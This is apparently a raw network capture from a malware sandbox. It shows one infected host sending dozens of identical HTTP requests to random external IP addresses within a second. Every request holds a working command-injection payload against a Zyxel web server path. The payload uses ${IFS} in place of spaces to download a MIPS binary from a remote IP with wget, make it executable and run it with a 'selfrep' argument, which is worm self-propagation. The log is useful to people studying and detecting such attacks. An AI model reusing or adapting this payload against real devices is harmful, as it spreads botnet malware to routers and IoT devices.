                                          Jan 14, 2024 15:46:09.842772961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2693192.168.2.2346830222.46.95.24443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.842808962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2694192.168.2.2349162120.176.58.120443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.842848063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2695192.168.2.234993620.85.52.144443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.842880964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2696192.168.2.2332994222.109.35.37443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.842911005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2697192.168.2.2343610124.6.115.72443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.842928886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2698192.168.2.233308084.157.210.117443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.842966080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2699192.168.2.2345762203.133.209.46443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.842993975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2700192.168.2.235670841.18.139.98443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.843002081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2701192.168.2.2350388219.51.198.204443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.843039989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2702192.168.2.234517073.31.150.215443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.843060017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2703192.168.2.235573886.208.83.236443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.843089104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2704192.168.2.235516412.228.229.27443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.843117952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2705192.168.2.235879691.43.7.15443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.843157053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2706192.168.2.2350366143.175.242.106443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.843190908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2707192.168.2.2354266202.70.8.90443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.843223095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2708192.168.2.233417613.147.251.244443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.843260050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2709192.168.2.233914241.221.182.179443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.843267918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2710192.168.2.2357292131.228.23.205443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.843270063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2711192.168.2.233621881.177.17.188443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.843297005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2712192.168.2.233469875.87.242.124443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.843337059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2713192.168.2.234215891.5.21.9443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.843360901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2714192.168.2.235083420.167.40.17443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.843378067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2715192.168.2.235499278.59.113.145443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.843399048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2716192.168.2.235999644.21.80.172443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.843415976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2717192.168.2.2349480181.91.176.186443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.843456030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2718192.168.2.2360552136.78.145.82443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.843468904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2719192.168.2.235939265.16.195.121443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.843499899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2720192.168.2.2358894118.48.116.190443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.843533039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2721192.168.2.2348376145.173.128.150443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.843537092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2722192.168.2.235934273.101.128.48443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.843566895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2723192.168.2.23367309.133.31.138443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.843591928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2724192.168.2.2333176197.233.202.161443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.843611956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2725192.168.2.2352380207.31.112.42443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.843636036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2726192.168.2.234511696.122.54.51443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.843668938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2727192.168.2.234965831.245.132.65443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.843696117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2728192.168.2.2342302135.127.48.234443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.843699932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2729192.168.2.2357000173.77.104.112443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.843729973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2730192.168.2.235291217.115.128.37443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.843758106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2731192.168.2.2353038156.174.249.204443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.843776941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2732192.168.2.2351652132.57.4.85443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.843813896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2733192.168.2.236020231.154.159.200443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.843833923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2734192.168.2.2352610189.3.72.212443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.843862057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2735192.168.2.2351880128.104.64.237443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.843888044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2736192.168.2.233710213.19.230.113443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.843897104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2737192.168.2.2360154213.37.68.232443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.843954086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2738192.168.2.2339134121.31.235.85443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.843978882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2739192.168.2.2356310129.41.109.30443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.843995094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2740192.168.2.2355792161.11.37.146443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.844018936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2741192.168.2.2350380200.60.194.156443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.844052076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2742192.168.2.2360958160.25.136.253443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.844101906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2743192.168.2.2352174190.122.156.43443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.844110012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2744192.168.2.234235435.145.20.113443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.844144106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2745192.168.2.2351408170.109.161.33443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.844165087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2746192.168.2.2338224106.65.1.115443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.844202995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2747192.168.2.2342434111.118.124.14443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.844221115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2748192.168.2.235061843.192.187.227443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.844255924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2749192.168.2.2339154102.138.85.7443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.844275951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2750192.168.2.2338328209.82.105.14443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.844288111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2751192.168.2.2333580117.21.196.101443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.844315052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2752192.168.2.2359094216.224.153.99443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.844326019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2753192.168.2.234671484.237.147.159443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.844337940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2754192.168.2.2358808116.177.109.84443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:09.844407082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2755192.168.2.234335070.220.166.12443
                                          TimestampBytes transferredDirectionData
